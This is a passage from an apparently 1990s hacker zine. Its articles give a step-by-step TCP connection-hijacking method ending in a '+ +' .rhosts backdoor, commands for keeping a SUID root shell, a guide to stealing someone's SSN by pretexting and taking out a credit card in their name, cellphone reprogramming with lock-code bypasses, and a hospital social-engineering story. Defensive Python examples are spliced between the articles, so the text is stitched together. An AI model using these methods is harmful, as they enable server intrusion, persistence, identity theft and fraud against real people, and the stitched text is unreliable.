            printf("resolving %s.%i\n", argv[1], compte); /* presentation thing */
            system(commande);               /* execute command */
            for (pause = 0; pause < 1000; pause++); /* little pause */
        }
        sprintf(commande, "date");          /* string "date" in commande */
        printf("DNS Scanning ended at this "); /* presentation thing */
        printf("%s :\n", commande);         /* presentation thing */
        system(commande);                   /* execute command */
        return 0;
    }
    /* if no arguments typed (or a bad one): presentation thing and usage */
    printf("1997 memor/hbs Usage : dns xxx.xxx.xxx \nfor searching from xxx.xxx.xxx.1 to xxx.xxx.xxx.255\n");
    return 1;
}

_____________________________________________________________

                         $$$$$$$$$$$$$$$$$
<<=========-----------$ Connection Hijacking Attack! $----------=========>>
                         $$$$$$$$$$$$$$$$$

God, this is going to take a while! This article includes all the goodies, and in complete detail tells how to literally hack a server using IP spoofing, one of the most misunderstood terms in the underground. Stupid fuckers have been using IP spoofing to go on irc and brag to their friends that they are k-rad. This is not why IP spoofing came around; in this text I will explain to you, in easy to understand language, that IP spoofing is just a step in the process of gaining access to a server you are not supposed to have access to.

The Basics
----------

In order to further understand what I am about to explain you must have a general knowledge of several things that I will explain in the following paragraphs... So no need to start to pout yet ;)

Three way Handshakes
--------------------

In order to start an actual data transfer of any kind on a network you must have what you call a "three way handshake"; it goes much like this. You send what is called a SYN packet to a host; the SYN packet has headers which in turn tell the host that you want to connect to it. The host sends you back an ACK, which tells you that it's alive and open for connections. Then you again send out an ACK to the host telling it that you're still alive, and the data transfer can begin. If that's a little confusing, I agree, it's confusing in words, but let me make a small diagram of what a three way handshake looks like:

  YOU --SYN-----> HOST   (You send out a SYN packet to the host, telling it you want to connect)
  YOU <--ACK----- HOST   (Host responds with an ACK or acknowledgment that it is alive and open)
  YOU -----ACK--> HOST   (You respond back and the data transfer can now begin.)
Every time you do a regular data transfer on the internet, such as bringing up a webpage, this three way handshake commences. So now you know how data gets from that machine to yours; this little bit of information is the basis of this attack.

.rhosts and trusted servers
---------------------------

Alright, let's say you have an internet account with a local Internet service provider (ISP), AND you have an account with another server, which gives you a shell account. A shell account is basically an account on the server's UNIX operating system. They give you a home directory in which you have access to text editors such as Joe and Pico, and you can also work on C programs using the gcc compiler.

O.K. now let's say you want to save some time, so you want to make the process of logging in to the shell account shorter, or maybe eliminate it completely. Well, due to the trust that a UNIX operating system has with its users, this can be done; the process of entering a password at the login screen can be eliminated. This can be done with a file called .rhosts, which will grant or deny access based off the IP address of the person trying to log on to the shell account itself. The server that is in the .rhosts file is called the trusted server, for the fact that when it sees that IP address it trusts them. It thinks that they are the person that is supposed, and allowed, to be there. UNIX will trust ANYONE with the specified IP address in the .rhosts file.

SYN Flooding
------------

A port on most UNIX operating systems can only handle a certain number of connections to one port at a time; this is called the "backlog". If the backlog is filled up all incoming SYN connections will be ignored, leaving them unable to connect to the server until the other connecting requests are dealt with properly.
But if the SYN headers are spoofed when sent to the host, the host will keep on trying to find the person who sent the original SYN message to it, and won't let anyone connect until it is done.

Here are the steps of a SYN Flood:

1) Person uses an IP spoofer to spoof his original IP address and sends out several SYN packets to a specified port at a host.
2) The host's port gets flooded with SYNs and tries to reply to the SYN command but can't, because the person who sent the original SYN is not a real host, leaving the ports closed, so no other connections can be made into that host.

  YOU (Spoofed IP) --SYN-----> HOST |
  YOU (Spoofed IP) --SYN-----> HOST |
  YOU (Spoofed IP) --SYN-----> HOST |
  YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections
  YOU (Spoofed IP) --SYN-----> HOST | will be ignored because all the
  YOU (Spoofed IP) --SYN-----> HOST | connections are taken
  YOU (Spoofed IP) --SYN-----> HOST |
  X (Not really real) <--ACK-- HOST |

So in turn the HOST cannot find YOU (with the spoofed IP), so the port is left flooded, because the host will not drop the connections until they are fulfilled. After a bit the server will crash. This is called a "Denial of service attack", for the fact that it denies anyone else service to that host. You can read more about denial of service in this newsletter.

Sequence Numbers?
-----------------

Sequence numbers are a prime factor in this attack, but also kinda hard to explain. I only have a general knowledge of sequence numbers, but a general knowledge is a hell of a lot better than no knowledge ;)

Every byte that you transfer from one computer to another on an Internet network is assigned a sequence number. Sequence numbers are assigned to make sure that the connection that is made doesn't become corrupt. Let's say we didn't have sequence numbers; then maybe by accident we got a repeat of a byte, and that would corrupt our data right there.
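Going back to the SYN flood section: the article describes the condition from the attacker's side, half-open entries piling up until the backlog is full. The detector below is an added example, not code from the article, that looks for that same condition from the server's side in connection-table records. The record format, the backlog value and the sample lines are all constructed for the example; a real deployment would feed it the output of netstat/ss or a firewall log in whatever shape it has.

```python
"""Half-open connection detector for the SYN-flood condition described above.

Added example, not code from the THTJ article.  Each record is one
connection-table entry in a constructed format:

    <time> <src ip>:<port> -> <dst ip>:<port> <state>

SYN_RECV means the server has answered with a SYN/ACK and is waiting
for the final ACK of the three way handshake; those are the entries
that fill the backlog.  BACKLOG is an assumed per-port limit.
"""
from collections import Counter, defaultdict

BACKLOG = 5  # assumed: tiny on purpose, like the 1990s stacks the article talks about

# Constructed sample: six half-open entries against the login port (513)
# from two never-answering sources, plus normal traffic to sendmail (25).
SAMPLE_TABLE = """\
10:00:01 198.51.100.7:1025 -> 192.0.2.10:513 SYN_RECV
10:00:01 198.51.100.7:1026 -> 192.0.2.10:513 SYN_RECV
10:00:01 198.51.100.8:1027 -> 192.0.2.10:513 SYN_RECV
10:00:02 198.51.100.8:1028 -> 192.0.2.10:513 SYN_RECV
10:00:02 198.51.100.7:1029 -> 192.0.2.10:513 SYN_RECV
10:00:02 198.51.100.8:1030 -> 192.0.2.10:513 SYN_RECV
10:00:02 203.0.113.9:40001 -> 192.0.2.10:25 ESTABLISHED
10:00:03 203.0.113.9:40002 -> 192.0.2.10:25 SYN_RECV
"""


def parse_record(line):
    """Split one table line into its fields; raises ValueError on junk."""
    time, src, arrow, dst, state = line.split()
    if arrow != "->":
        raise ValueError(f"malformed record: {line!r}")
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {
        "time": time,
        "src_ip": src_ip,
        "src_port": int(src_port),
        "dst_ip": dst_ip,
        "dst_port": int(dst_port),
        "state": state,
    }


def half_open_by_port(records):
    """Count SYN_RECV entries per (dst ip, dst port) and remember who sent them."""
    counts = Counter()
    sources = defaultdict(set)
    for rec in records:
        if rec["state"] != "SYN_RECV":
            continue
        key = (rec["dst_ip"], rec["dst_port"])
        counts[key] += 1
        sources[key].add(rec["src_ip"])
    return counts, sources


def find_saturated_ports(table_text, backlog=BACKLOG):
    """Return {"ip:port": {"half_open": n, "sources": [...]}} for ports at or over the backlog."""
    records = [parse_record(l) for l in table_text.splitlines() if l.strip()]
    counts, sources = half_open_by_port(records)
    return {
        f"{ip}:{port}": {"half_open": n, "sources": sorted(sources[(ip, port)])}
        for (ip, port), n in counts.items()
        if n >= backlog
    }


if __name__ == "__main__":
    for port, info in find_saturated_ports(SAMPLE_TABLE).items():
        print(f"{port}: {info['half_open']} half-open entries from {', '.join(info['sources'])}")
```

A single unanswered SYN is normal; the signal is a port whose half-open count sits at the backlog, with sources that never complete the handshake. Modern stacks answer with SYN cookies once the queue fills, so the port no longer "closes" as the article says, but the count of SYN_RECV entries against one port is still the indicator to alert on.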
In a three way handshake, the first sent SYN packet contains what is called the Initial Sequence Number; that sequence number tells the host what the next sequence number is. (Confused yet?) This will all come together when I explain the attack itself; it's all got to do with timing and round trip time. Round trip time is how long it takes your SYN packet to reach the host and the host to send back its ACK (acknowledgment). Let's say you had to do this all by hand: you send out the SYN command, and the host sends back the ACK command; you have to calculate the exact sequence number timing in order to send the ACK back to the host to start the data transfer.

- If the sequence number you send is a smaller number than what the server expects, it will just throw that try off, because it thinks it's an old packet that never reached or has failed before.
- If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin.
- If the sequence number you send is greater than what the host expects, it will hold that sequence number, because it thinks that it is a future bit, and it will hold it until the other bits come through first.

Trust me, this may all sound stupid now when I'm explaining it, but it all does come together when I start explaining the attack; you need to be able to spoof the ACK command that goes to the host when doing the 3 way handshake. Oh, and each time a connection is made to the host that you are making the connection to, the sequence number goes up 64,000. The Initial Sequence Number goes up 128,000 every second, and wraps every 9.32 hours. This counting process will be needed later on in the attack.
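To see why the numbers in the paragraph above (64,000 per connection, 128,000 per second, a wrap every 9.32 hours) made the attack possible, here is an added example, not code from the article, that models that generator and contrasts it with a keyed-hash ISN of the kind RFC 6528 describes. It shows a one-sample prediction landing exactly on the clock-driven generator's next value and landing nowhere near the keyed one. Everything in it is constructed; no real stack is queried, and the key is a demo constant.

```python
"""Initial sequence number predictability: the 1990s clock-driven scheme versus a keyed one.

Added example, not code from the article.  legacy_isn() follows the
behaviour the text describes (+128,000 per second, +64,000 per
connection, 32-bit wrap); keyed_isn() adds a secret-keyed hash of the
connection 4-tuple, the RFC 6528 approach, so that one observed ISN
tells an outsider nothing about the next one.
"""
import hashlib
import hmac

MOD = 1 << 32            # sequence numbers are 32-bit
PER_SECOND = 128_000     # ISN clock rate stated in the article
PER_CONNECTION = 64_000  # per-connection increment stated in the article


def legacy_isn(t_seconds, connections, base=0):
    """ISN handed out by the clock-driven generator at time t after 'connections' opens."""
    return (base + int(t_seconds * PER_SECOND) + connections * PER_CONNECTION) % MOD


def predict_from_sample(sampled_isn, elapsed_seconds, new_connections):
    """What an observer who saw one ISN extrapolates for a later connection."""
    return (sampled_isn + int(elapsed_seconds * PER_SECOND) + new_connections * PER_CONNECTION) % MOD


def wrap_period_hours():
    """How long the clock term takes to cycle through all 2**32 values."""
    return MOD / PER_SECOND / 3600


def keyed_isn(secret, src, sport, dst, dport, t_seconds):
    """RFC 6528-style ISN: a 4 microsecond clock term plus a keyed hash of the 4-tuple."""
    tag = hmac.new(secret, f"{src}:{sport}>{dst}:{dport}".encode(), hashlib.sha256).digest()
    return (int(t_seconds * 250_000) + int.from_bytes(tag[:4], "big")) % MOD


def prediction_error(actual, predicted):
    """Distance between a guess and the real ISN, taking the 32-bit wrap into account."""
    d = (actual - predicted) % MOD
    return min(d, MOD - d)


if __name__ == "__main__":
    # Constructed scenario: observe one ISN, then guess the ISN issued
    # 2.5 s and 3 connections later.
    sample = legacy_isn(10.0, 5)
    guess = predict_from_sample(sample, 2.5, 3)
    print("legacy generator: prediction error", prediction_error(legacy_isn(12.5, 8), guess))

    secret = b"constructed-demo-key-not-for-use"  # assumption: a per-boot secret
    sample = keyed_isn(secret, "198.51.100.7", 1025, "192.0.2.10", 513, 10.0)
    guess = predict_from_sample(sample, 2.5, 3)
    actual = keyed_isn(secret, "198.51.100.8", 1028, "192.0.2.10", 513, 12.5)
    print("keyed generator: prediction error", prediction_error(actual, guess))
    print("clock term wraps every %.2f hours" % wrap_period_hours())
```

The legacy error is zero because the generator has no input an outsider cannot observe or compute. With the keyed hash, the clock term is still there (so sequence numbers keep moving forward for the same 4-tuple, which TCP needs), but the per-connection offset depends on a secret, and the prediction is off by an essentially random 32-bit amount.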
The Attack
----------

I really can't express enough how much you need to understand the above features before going and trying to execute this attack, just for the fact that you will not be successful in your attempt. It took me 3 good days of reading to readily understand sequence numbers, and I suggest you also read all you can on sequence numbers: do searches, read internet protocol articles, just make sure you understand what you are doing before you get your hopes up, to find out that you didn't calculate the round trip time right and you end up with a smaller sequence number than originally intended. It's a bummer and a waste of time if you don't understand it.

Short Explanation
-----------------

1) Choose the target
2) Find trusted host
3) SYN Flood trusted host
4) Spoof the trusted host
5) Guess the sequence numbers for the outgoing ACK
6) Make the connection
7) Leave a backdoor in the .rhosts file

Finding a Target
----------------

This should be fairly easy, based on the fact that you're either the kind of person who has a personal vendetta with a server or you just want to try this out. Or you can get special permission from 2 hosts that will allow you to do this as a security measure; that is probably the best way to go to avoid any sort of criminal prosecution. I urge you to not in any way incriminate yourself; this text is for security reasons only, to inform and protect. This attack is NOT new, I did not make up this attack, I'm only explaining it and how to prevent it. So don't come crying to me when you get raided and you have nowhere else to go. Stay safe and be paranoid.

Finding a target's Trusted Host
-------------------------------

Once you have your target, you want to find out if it has a trusted host. Since you can't go into their computer and look to see if they even have an .rhosts file, you have to do the checking out yourself.
If the target host does not have a trusted host, this whole text is very pointless, but from here on in, I am talking as if the target host does in fact have a trusted host. This is where you use your talent of social engineering. Finding the trusted host is hard, I'll admit that, but if you're going to go this far you might as well find out about the system you're going to hack: know what you're doing, know the system before you go in. Here is a list of possible ways to maybe gain information about trusted hosts:

  showmount -e target              -> shows where the file systems are exported
  finger -l @target
  finger -l @trustedserver.com
  finger -l root@trustedserver.com
  rpcinfo -p x-terminal

These are a couple of ways off the top of my head, but you can always find shit out. Basically use your head in this matter, because, well, this isn't the hardest part of the attack; it may seem that way now, but it only gets harder from here on out. Talk to a representative of the company, I dunno, read up on social engineering...

Over all, this attack comes down to trusted hosts, which are inserted into the .rhosts file itself; this is why I spent some time explaining .rhosts files, because if you can become the trusted host you also have access to the target host. Is this getting better by the minute or what?

SYN Flood trusted host
----------------------

In order for this whole thing to go through, the trusted host must be taken out with a SYN flood (SYN flooding was discussed earlier in this article), for the fact that in later parts of this attack you need to spoof as the trusted host, then send out a SYN command to the target host's port to try to connect to it, and if the host you're attacking can send a message back to the trusted host, it would get an error saying that host did not send out a SYN packet for an opening connection. So, in turn, to make sure that does not happen, you must flood the ports of the trusted host so no other connections can be made.
*NOTE* This is because you are flooding ports on the trusted host, and when the port on the trusted host is still looking for someone to send back an ACK to it (it is still gagged by the SYN flood) it doesn't let any other connections come through. So you can successfully guess the sequence numbers (in time) that the trusted host would send to the target host.

SYN flooding software is readily available at many "Underground" sites and I won't go into posting the code here, for the fact that I'm just wasting space when you can do a search on the internet yourself and find it. For example a very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder. But this NEEDS to be done; you don't need any interruptions in this attack.

Sample the sequence numbers
---------------------------

Because you are not the real host, you are merely a spoofed version of the trusted host, you also have to spoof the return sequence number. Remember in the three way handshake there is first a SYN from you, that tells the host that you want a connection to its server, then the host sends back an ACK or acknowledgment. So if you spoof the trusted server and send out a SYN packet, the server you just sent the SYN packet to will try to reply back. If you don't guess the right sequence numbers (OR the timing of the transfer) it won't let you log in. See, if the REAL trusted host was available (not under a SYN flood) the real trusted host would have given the other host an error. But with the SYN flood gumming up the works, and not allowing any other connections, you can successfully spoof the ACK back to the host so you can connect.

Before you do the initial attack, connect to one of the major ports on the server you're going to attack, like port 25 (the sendmail port), and sample its sequence numbers. You need to calculate how long it takes for your SYN to reach the server and a SYN/ACK to be sent back to you, then the ACK you send back to the host, all in one.
Do this many times until you have enough that you feel is a good diagram to round up and become one figure. Remember sequence numbers go up 128,000 a second, and 64,000 per connect.

- If the sequence number you send is a smaller number than what the server expects, it will just throw that try off, because it thinks it's an old packet that never reached or has failed before.
- If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin.
- If the sequence number you send is greater than what the host expects, it will hold that sequence number, because it thinks that it is a future bit, and it will hold it until the other bits come through first.

Spoof the trusted host
----------------------

This is easy: there is a lot of IP spoofer software for Linux and the UNIX flavors, just pick one of these up and compile it. *NOTE* You must have root on the Linux operating system you are doing the attack from, for the fact that if you just have a regular home directory you cannot open up the raw connections which are needed for a general spoof. So load it up and spoof the address of the TRUSTED host, and go right on to the next part.

The heart of the attack
-----------------------

This is the main part of the attack. Once you are spoofed as the trusted host, you should send a connection request to port 513 (the login port). Then the host will send back a SYN/ACK to the trusted host, which is under the gagging of the SYN flood, so it won't accept any more connections, hence it won't get an error back. While this is all going on we have to wait for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK back to the host you are attacking with your guessed sequence number attached (plus one, because we are sending for a login). If your guess is correct it will then accept your connection.
Type the magical word root, and since that .rhosts file is there, and you are spoofed as the trusted host, you will get automatic access to the system. Isn't UNIX great? Trust is a great thing to encounter in any type of Linux operating system.

Once inside..
-------------

Since you really don't need to edit or destroy any log files, you are home free, but as one last thing we do, we will put in a backdoor so we can access their system as we please (no more of this spoofin' shit), so we do a cat + + >> ~/.rhosts . When you add a + + (as explained earlier) it's basically saying any host is allowed without entering a password. The only problem with that is a lot of systems nowadays are equipped with a program that looks for .rhosts files that have a + + in them. But oh well, fuck it, you're in it just for the hack of it, right?

Conclusion paragraph
--------------------

Basically this attack is very useful if you know what you are doing. This wasn't as 'in depth' as I would have liked to go, but well, I'm not the kind of person who can splash what's all in my head onto a piece of paper; it's easier for me to consume information than give it away. But I tried my best and I hope you could understand it. I'd like to give a couple of shoutouts to the people who made this article happen: Phrack, Modify for teaching me the art of spell check, and the whole 0 cr3w. Remember, before asking a question, always try to answer it yourself first.

Phe3r m3,
Merde Fuk

_____________________________________________________________

One method to keep root...............WaRsPrItE

-----BEGIN PGP SIGNED MESSAGE-----

First off, this is NOT a true hack since it requires that you have root access to begin with. I'm including it only as a way to keep root once you find it. I mean c`mon, how hard is it to write a simple script or batch job to do a "who -a | grep root" every five minutes and log the output to a file at $home/.root and tail it to an xterm window? Sooner or later root will forget to log off!
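The "+ +" line the hijacking article leaves in .rhosts and the SUID copy of /bin/sh this keep-root article goes on to describe are the two artefacts an administrator sweeps for (the article itself admits many systems ran a program that looks for + + entries). The script below is an added example, not code from the zine: it walks a directory tree and reports wildcard .rhosts entries and setuid/setgid files that are not on an allowlist. The sample tree, the allowlist and the file names are constructed for the example; a real run would start at / and take the allowlist from the package manager's manifest.

```python
"""Finding the persistence artefacts these two articles describe.

Added example; not code from the zine.  It walks a directory tree and
reports (1) .rhosts files containing a "+" wildcard for host or user,
which is what a "+ +" backdoor line looks like, and (2) setuid/setgid
files not on an allowlist, which catches a SUID copy of /bin/sh parked
in a home directory.  build_sample_tree() creates a constructed tree in
a temporary directory; KNOWN_SUID is an assumed allowlist.
"""
import os
import shutil
import stat
import tempfile

KNOWN_SUID = {"/bin/su", "/usr/bin/passwd"}  # assumed allowlist of legitimate setuid binaries


def rhosts_wildcards(path):
    """Return (line number, text) for every .rhosts entry with a '+' host or user."""
    findings = []
    with open(path) as fh:
        for lineno, raw in enumerate(fh, 1):
            fields = raw.split()
            if not fields or fields[0].startswith("#"):
                continue
            host = fields[0]
            user = fields[1] if len(fields) > 1 else None
            if host == "+" or user == "+":
                findings.append((lineno, raw.strip()))
    return findings


def audit_tree(root, allowlist=KNOWN_SUID):
    """Scan 'root' as if it were '/' and return the two finding lists."""
    report = {"rhosts": [], "suid": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and special files are not what we are after
            rel = "/" + os.path.relpath(full, root)
            if name == ".rhosts":
                for lineno, text in rhosts_wildcards(full):
                    report["rhosts"].append((rel, lineno, text))
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID) and rel not in allowlist:
                report["suid"].append(rel)
    return report


def build_sample_tree():
    """Constructed fixture: one wildcard .rhosts, one rogue SUID shell, one legitimate su."""
    root = tempfile.mkdtemp(prefix="thtj-audit-")
    os.makedirs(os.path.join(root, "home", "alice"))
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "home", "alice", ".rhosts"), "w") as fh:
        fh.write("trusted.example.net alice\n+ +\n")
    rogue = os.path.join(root, "home", "alice", ".root_shell")
    with open(rogue, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(rogue, 0o4111)  # mode 4111, the setuid-without-read mode used in the recipe
    legit = os.path.join(root, "bin", "su")
    with open(legit, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(legit, 0o4755)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        report = audit_tree(root)
        for finding in report["rhosts"]:
            print("wildcard .rhosts entry:", finding)
        for path in report["suid"]:
            print("unexpected setuid/setgid file:", path)
    finally:
        shutil.rmtree(root)
```

The walk uses lstat and skips anything that is not a regular file, so a symlink pointing at a real setuid binary does not produce a false positive, and a "." in the file name (the article's trick for keeping prying eyes out) makes no difference to a mode-bit check.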
I've only managed to get this to work on a few *NIX systems, and Solaris 2.4.1 and higher has fixed this hole. But those assholes at Santa Cruz Operations ...... *evil grin*

  # cp /bin/sh $home/.root_shell
  # chmod 4111 $home/.root_shell

These commands create a SUID root version of the Bourne shell ("sticky bit") in the home directory of the user. I personally use a file name with a "." just to keep prying eyes out. You can optionally use commands like "chmod g+s" to execute a file as the GUID of the file. Assuming of course you have access as the appropriate group to begin with. Which is easy, `cause people always forget to log off (especially around lunch time :) ). This would be handy in case you want to look at payroll records in, say, the "accounting" group. Once again, security compromise via stupid end users!

WaRsPrItE

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBMd/HlH5eXk/jGmY7AQHPpQf/cn2vesmlxbIOdpIiVY53FUcoJmihsEuc
eTBMdCtyBibLxzVk9xak2GTtNcxppFphtLWh3v0f5aKF61NFSMsj7g1e1DcmMAn5
KTijlQc2pgB0OLhorsTA+/rSGl/TRa4uNVIYLpvCoU1H+5Y/kP8RuD1kgvgvl7Xe
R0zHmfqMYnRz5U8nedH2xagvnxnRixglt+bnYZS5/4fGuE9b2oz6iKbA7hG+ya9Q
rlTBvSd9uUw7nwtJgBdj7MMtlGwRhCUWP0pQBniYSbBOMfRZ22gL8is5lI2f8Tqh
To0YOe6T1dPvkYzYmvafz3F6IR5pnSltONeuUaeCSI3nBWGrpiaU/A==
=JVIc
-----END PGP SIGNATURE-----

-==-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=----=-=-=-=-=-=--=

Carding..more basics for the lame... BY ArcAngl

To check if a CC # is valid phone 1-800-228-1122 (need merchant # usually 5 digits)

To obtain a valid credit card under someone else's name:

1. Identify a target name, such as one of your teachers, co-workers, etc...

2. Once you have a target name, you need to obtain their SSN. This can be done in many ways using social engineering. For example: call up the target's electric company, saying you are him, and that you need to make a change to your mailing information possibly. Ask them what information they have on record.
Then say, "Also, I'd like to verify my SSN that you have, I had a mix up a few years ago, and I want to make sure you have the correct one...what do you have?"

3. Once you have the target's SSN, obtain a Visa/MasterCard application. You can find these in many places: banks, magazine inserts, etc...or simply call and request one. Once you have the application, simply fill out the form with the target's name. Now the hard part: for the address, you will need to have a place that you have access to the mail delivery. DO NOT USE YOUR OWN! You may try: neighbors on extended vacation, house where people just moved out, house just built, a friend that will deny any receipt of a card, etc...you get the picture. Then fill in the target's SSN and the rest of the info. Then simply mail it! You may also call in the info and ask for overnight processing. Do this from a payphone, or op divert for the uberelite!

4. The new card will be sent to the address you specified. It will be a valid card, in the target's name, and all charges will reflect on the target's credit report. It will take months for the target to realize there is a card out there in his name. You have the physical card in your possession...how many times does WalMart ask for ID when charging a new Pentium? NONE!!!! Oh yeah...watch for cameras that will id you!

_____________________________________________________________

Cellular Programming Archives, Pt. I
from Phrax

Phrax has been kind enough to provide everyone with a large volume of information on cellular phone programming for about every phone out there. Over the next few months, THTJ will be posting cellular information from the large archive that Phrax has collected. And, as always, this information is for informative purposes only, so we know you will only use it for that, and not to phreak some phones ..... ( yea right! ).

-------

AUDIOVOX BC40, 45, CMT400, 405, 410, 450, 550, 600, 605, 750, 1700, SP75

NOTES: This is a single NAM unit.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit.
Audiovox: 516-231-6051/213-926-7758

NAM programming:

1. With the power turned on enter N N N FUNC # 1, where NNN is the three digit lock code. The manufacturer's default is 000.
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step number.
6. FUNC SND completes programming.
7. FUNC CLR exits programming mode.

PROGRAMMING DATA:

STEP#  #OF DIGITS/RANGE  DESCRIPTION
01     3 DIGITS          FIRST THREE DIGITS OF PHONE NUMBER
02     4 DIGITS          LAST FOUR DIGITS OF PHONE NUMBER
03     3 DIGITS          LOCK CODE
04     3 DIGITS          AREA CODE
05     00001 - 32767     SYSTEM ID
06     0 OR 1            HORN ALERT
07     0 OR 1            HANDS FREE
08     0 OR 1            CONTINUOUS DTMF
09     0 OR 1            REPERTORY DIALLING
10     00 TO 15          GROUP ID (10 FOR USA)
11     00 TO 15          ACCESS OVERLOAD CLASS
12     0000 (ONLY)       STATION CLASS MARK
13     0 OR 1            LOCAL USE MARK
14     0 OR 1            MIN MARK
15     0333/0334         IPCH, AUTOMATICALLY SET
16     0 OR 1            PREFERRED SYSTEM, AUTOMATICALLY SET
17     000 TO 255        SEE NOTE 1 BELOW
18     000               SET TO 000 ONLY
19     000               SET TO 000 ONLY
20     00001 - 99999     SYSTEM ID INHIBIT
21     0 TO 31           HORN ALERT TIME OUT IN HOURS (CMT 550 ONLY)
22     0 TO 31           ELEC MESSAGE RECORDER TIME OUT IN HOURS (CMT 550 ONLY). SEE ALSO NOTE 2 BELOW.
23     0 TO 255          NO CHARGE AIR TIME DELAY IN SECS (NOT ALL MODELS)
24     000 TO 999        AIR TIMER CLEAR CODE
25     000               SET TO 000 ONLY
26     CHECKSUM          AUTOMATICALLY SET
27     CHECKSUM          AUTOMATICALLY SET

NOTES:

1. These options can be selected by adding together the following codes: 0 = No options, 1 = Preferred system lock (not on CMT 550), 2 = Auto Lock (CMT 550 only), 4 = Call timer beep (CMT 550 only), 8 = Home Roam inhibit, 16 = Automatic system redial (CMT 550 only). Add together the codes of the desired options; for example, to select Call timer beep and auto redial add 4 to 16 for a code of 020.

2.
1 to 31 hours, except that a setting of 0 will turn the phone off after 8 hours.

LOCK: F 4.
UNLOCK: Enter three digit code.

A/B SYSTEM SELECT: This procedure only works on models manufactured after September 19, 1987. The first two digits of the serial number indicate the month (01-12), the third digit of the serial number indicates the last digit of the year (198n). FCN 7 STO = PREFERRED SYSTEM, FCN 8 STO = HOME SYSTEM ONLY, FCN 9 STO = NON PREFERRED SYSTEM, FCN 0 SWITCHES BETWEEN A/B AND B/A, PRESS STO WHEN THE DESIRED OPTION IS DISPLAYED.

------

AUDIOVOX CTX1500, 2500, 4000, 5000, BC410, 55, SP85, TRANS 410.

NOTES: These are single NAM units.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit, see below for "back door" programming methods.
Audiovox: 516-231-6051/213-926-7758

NAM programming:

1. With the power turned on enter N N N FUNC # 1, where NNN is the three digit lock code. The manufacturer's default is 000.
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step number.
6. FUNC SND completes programming.
7. FUNC CLR exits programming mode.

PROGRAMMING DATA:

STEP#    #OF DIGITS/RANGE  DESCRIPTION
01       10 DIGITS         MIN (AREA CODE & PHONE NUMBER)
02       3 DIGITS          LOCK CODE
03       00000 - 99999     SYSTEM ID
04       00 - 15           ACCESS OVERLOAD CLASS
05       00 - 15           SYSTEM ID (10 FOR USA)
06       0 OR 1            LOCAL USE MARK
07       0 OR 1            MIN MARK
08       0333 OR 0334      INITIAL PAGING CHANNEL
09       0 OR 1            PREFERRED SYSTEM
10       4 DIGITS          STATION CLASS MARK
11       8 BINARY DIGITS   FUNCTION 1, SEE NOTE 1 BELOW
12       8 BINARY DIGITS   FUNCTION 2, SEE NOTE 2 BELOW
13       00 TO 31 HOURS    POWER OFF TIMER (CTX 4000 ONLY)
14       000 TO 255 SECS   NO CHARGE AIR TIMER DELAY
15       3 DIGITS          CALL TIMER RESET CODE
16 - 20  00000 - 99999     SIDH INHIBIT # 1 THRU # 5
21 - 25  NOT USED          FUTURE USE

NOTES:

1. This is an eight digit binary field.
   10000000 = CALL TIMER BEEP
   01000000 = AUTO LOCK
   00100000 = AUTO SYSTEM REDIAL
   00010000 = CALL RESTRICTION
   00001000 = 32 DIGIT DIALING CAPABILITY
   11111000 = ALL OF THE ABOVE

2. As above but options are:

   10000000 = HANDS FREE
   01000000 = CONTINUOUS DTMF
   00100000 = REPERTORY DIALING
   00010000 = HORN ALERT
   00001000 = ALLOWS 911 CALLING WHEN UNIT IS LOCKED
   01101000 = ALL OF THE ABOVE

A/B SYSTEM SELECT: FCN 0 4 DISPLAYS CURRENT MODE, FCN 0 0 = PREFERRED/NON-PREFERRED, FCN 0 1 = PREFERRED ONLY, FCN 0 2 = HOME ONLY, FCN 0 3 = NON PREFERRED ONLY.

"BACK DOOR" PROCEDURES: We cannot guarantee the accuracy of these procedures, USE CAUTION!

SP 85: The lock code can be reset to 000 by shorting pins 6 and 17 on the handset control connector.
CTX SERIES: Short pins 6 and 17 on the data cable, turn power on and enter 000 FUNC # 1.
TRANS 55 AND BC 55: Ground pin 1 of the six pin connector next to the modular jack on the transceiver. Looking at the transceiver with the modular jack to the right of the six pin connector, pin one is bottom right.

LOCK: Press LOCK.
UNLOCK: Enter three digit code.
SYSTEM SELECT: F 0 4 shows current mode. F 0 0 = Pref/Non pref, F 0 1 = Pref only, F 0 2 = Home Only, F 0 3 = Non pref only.

------

Well, this is all for this month, tune in next month for more information.

_____________________________________________________________

Basic Social Engineering...............WaRsPrItE

-----BEGIN PGP SIGNED MESSAGE-----

I hesitate to even type this up and submit it for distribution. But I want to make the point that hacking takes RESEARCH! The easiest way to gain access to somebody's account is to just ask them for their password. Here's a perfect example.

One day visiting my Mom at work I was in the IS department at my local hospital. I noticed a modem labeled "Dial Up" followed by the phone number. So just for giggles I called it and saw:
  <name of the hospital> Medical Manager
  SCO Unix release 2.3.4
  login:

I went to the hospital the next day and found an old WYSE60 terminal with the same login screen sitting on one of the desks. But the terminal also had a sticker on it from the vendor advertising their support line: "In case of trouble call <company name> 1-800-555-XXXX". Making a mental note of the vendor's name I glanced down at the phone and made another mental note of an inside line phone number. The next day I called the office on the inside line and the conversation went something like this.

Office girl: "<name of the department> Jackie speaking. How may I help you?"
Me: "Hi Jackie! This is <fake name> calling from <company name>. How are you?"
Office girl: "Good. What can I do for you?"
